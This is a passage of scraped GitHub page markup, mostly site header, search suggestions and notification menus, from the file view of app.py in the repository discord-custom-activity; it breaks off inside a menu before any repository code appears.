jump to results</span> </li> </ul> <ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="owner_scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-center flex-items-center p-0 f5 js-jump-to-suggestion"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="m-3 anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </li> </ul> </div> </label> </form> </div> </div> <nav class="d-flex flex-column flex-md-row flex-self-stretch flex-md-self-auto" aria-label="Global"> <a class="Header-link py-md-3 d-block d-md-none py-2 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:dashboard:user" aria-label="Dashboard" href="/dashboard"> Dashboard </a> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g p" data-ga-click="Header, click, Nav menu - item:pulls context:user" aria-label="Pull requests you created" data-selected-links="/pulls /pulls/assigned /pulls/mentioned /pulls" href="/pulls"> Pull<span class="d-inline d-md-none d-lg-inline"> request</span>s </a> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g i" data-ga-click="Header, click, Nav menu - item:issues context:user" aria-label="Issues you created" data-selected-links="/issues /issues/assigned /issues/mentioned /issues" href="/issues"> Issues </a> <div class="d-flex position-relative"> <a class="js-selected-navigation-item Header-link flex-auto mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:marketplace context:user" data-octo-click="marketplace_click" data-octo-dimensions="location:nav_bar" data-selected-links=" /marketplace" href="/marketplace"> Marketplace </a> </div> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:explore" data-selected-links="/explore /trending /trending/developers /integrations /integrations/feature/code /integrations/feature/collaborate /integrations/feature/ship showcases showcases_search showcases_landing /explore" href="/explore"> Explore </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:workspaces context:user" data-selected-links="/codespaces /codespaces" href="/codespaces"> Codespaces </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:Sponsors" data-hydro-click="{&quot;event_type&quot;:&quot;sponsors.button_click&quot;,&quot;payload&quot;:{&quot;button&quot;:&quot;HEADER_SPONSORS_DASHBOARD&quot;,&quot;sponsorable_login&quot;:&quot;Bomzz06&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="bd1bd75996ab4eff9f5b387e38edf22001205b12681e2842dd057d0e48923133" data-selected-links=" /sponsors/accounts" href="/sponsors/accounts">Sponsors</a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/settings/profile"> Settings </a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/Bomzz06"> <img class="avatar avatar-user" loading="lazy" decoding="async" src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" width="20" height="20" alt="@Bomzz06" /> Bomzz06 </a> <!-- '"` --><!-- </textarea></xmp> --></option></form><form action="/logout" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="7CRAnGj7pqObLLiqjYJPpFQeg2cccpPDh0ctdI4Lqo0Hlukm6FXrZK/EIk1HHF4MURwQnRCShkxzFpTKrvK3qg==" /> <button type="submit" class="Header-link mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade d-md-none btn-link d-block width-full text-left" style="padding-left: 2px;" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;sign out&quot;,&quot;label&quot;:&quot;icon:logout&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c463a3af349de8e5d9dbb16a9542d05b9d2d051ce270dca9bac1fd9137a14c9a" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-sign-out v-align-middle"> <path fill-rule="evenodd" d="M2 2.75C2 1.784 2.784 1 3.75 1h2.5a.75.75 0 010 1.5h-2.5a.25.25 0 00-.25.25v10.5c0 .138.112.25.25.25h2.5a.75.75 0 010 1.5h-2.5A1.75 1.75 0 012 13.25V2.75zm10.44 4.5H6.75a.75.75 0 000 1.5h5.69l-1.97 1.97a.75.75 0 101.06 1.06l3.25-3.25a.75.75 0 000-1.06l-3.25-3.25a.75.75 0 10-1.06 1.06l1.97 1.97z"></path> </svg> Sign out </button> </form></nav> </div> <div class="Header-item Header-item--full flex-justify-center d-md-none position-relative"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item mr-0 mr-md-3 flex-order-1 flex-md-order-none"> <notification-indicator class="js-socket-channel" data-test-selector="notifications-indicator" data-channel="eyJjIjoibm90aWZpY2F0aW9uLWNoYW5nZWQ6OTE3MzcxMDMiLCJ0IjoxNjMzMzQ2MTgxfQ==--5e54d272a19096ed553a1610cc3407141ef88eed8ceb8bfdd60a0ad8f63d0370"> <a href="/notifications" class="Header-link notification-indicator position-relative tooltipped tooltipped-sw" aria-label="You have no unread notifications" data-hotkey="g n" data-ga-click="Header, go to notifications, icon:read" data-target="notification-indicator.link"> <span class="mail-status " data-target="notification-indicator.modifier"></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path> </svg> </a> </notification-indicator> </div> <div class="Header-item position-relative d-none d-md-flex"> <details class="details-overlay details-reset"> <summary class="Header-link" aria-label="Create new…" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;create new&quot;,&quot;label&quot;:&quot;icon:add&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="5f5a09b269e7a6c9f60268558c0cd09e2184078ca0e24ebb6b686a24fac0dc94" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus"> <path fill-rule="evenodd" d="M7.75 2a.75.75 0 01.75.75V7h4.25a.75.75 0 110 1.5H8.5v4.25a.75.75 0 11-1.5 0V8.5H2.75a.75.75 0 010-1.5H7V2.75A.75.75 0 017.75 2z"></path> </svg> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw"> <a role="menuitem" class="dropdown-item" href="/new" data-ga-click="Header, create new repository"> New repository </a> <a role="menuitem" class="dropdown-item" href="/new/import" data-ga-click="Header, import a repository"> Import repository </a> <a role="menuitem" class="dropdown-item" href="https://gist.github.com/" data-ga-click="Header, create new gist"> New gist </a> <a role="menuitem" class="dropdown-item" href="/organizations/new" data-ga-click="Header, create new organization"> New organization </a> </details-menu> </details> </div> <div class="Header-item position-relative mr-0 d-none d-md-flex"> <details class="details-overlay details-reset js-feature-preview-indicator-container" data-feature-preview-indicator-src="/users/Bomzz06/feature_preview/indicator_check"> <summary class="Header-link" aria-label="View profile and more" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;show menu&quot;,&quot;label&quot;:&quot;icon:avatar&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="28010ab2db5d0607297200310a6b073105d38e1e90c184d9c408d3e208df889e" > <img src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" alt="@Bomzz06" size="20" height="20" width="20" data-view-component="true" class="avatar-user avatar avatar-small"></img> <span class="feature-preview-indicator js-feature-preview-indicator" style="top: 1px;" hidden></span> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw" style="width: 180px" src="/users/91737103/menu" preload> <include-fragment> <p class="text-center mt-3" data-hide-on-error> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </p> <p class="ml-1 mb-2 mt-2 color-text-primary" data-show-on-error> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> Sorry, something went wrong. </p> </include-fragment> </details-menu> </details> </div> </header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div>{{ message }}</div> </div> </div> </template> </div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container > <div id="repository-container-header" class="hx_page-header-bg pt-3 hide-full-screen mb-5" data-pjax-replace> <div class="d-flex mb-3 px-3 px-md-4 px-lg-5"> <div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="user" data-hovercard-url="/users/agambajwa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/agambajwa">agambajwa</a> </span> <span class="mx-1 flex-self-stretch color-text-secondary">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#js-repo-pjax-container" href="/agambajwa/discord-custom-activity">discord-custom-activity</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </h1> </div> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <notifications-list-subscription-form class="f5 position-relative d-flex"> <details class="details-reset details-overlay f5 position-relative" data-target="notifications-list-subscription-form.details" data-action="toggle:notifications-list-subscription-form#detailsToggled" > <summary class="btn btn-sm rounded-right-0" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;WATCH_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0fb560a2317ad347e2cbc363b6cb6c00bf2246de638afe04d1f19de85667d64c" data-ga-click="Repository, click Watch settings, action:blob#show" aria-label="Notifications settings"> <span data-menu-button> <span hidden data-target="notifications-list-subscription-form.unwatchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Unwatch </span> <span hidden data-target="notifications-list-subscription-form.stopIgnoringButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell-slash"> <path fill-rule="evenodd" d="M8 1.5c-.997 0-1.895.416-2.534 1.086A.75.75 0 014.38 1.55 5 5 0 0113 5v2.373a.75.75 0 01-1.5 0V5A3.5 3.5 0 008 1.5zM4.182 4.31L1.19 2.143a.75.75 0 10-.88 1.214L3 5.305v2.642a.25.25 0 01-.042.139L1.255 10.64A1.518 1.518 0 002.518 13h11.108l1.184.857a.75.75 0 10.88-1.214l-1.375-.996a1.196 1.196 0 00-.013-.01L4.198 4.321a.733.733 0 00-.016-.011zm7.373 7.19L4.5 6.391v1.556c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01.015.015 0 00.005.012.017.017 0 00.006.004l.007.001h9.037zM8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path> </svg> Stop ignoring </span> <span data-target="notifications-list-subscription-form.watchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Watch </span> </span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu " role="menu" data-target="notifications-list-subscription-form.menu" > <div class="SelectMenu-modal notifications-component-menu-modal"> <header class="SelectMenu-header"> <h3 class="SelectMenu-title">Notifications</h3> <button class="SelectMenu-closeButton" type="button" aria-label="Close menu" data-action="click:notifications-list-subscription-form#closeMenu"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path 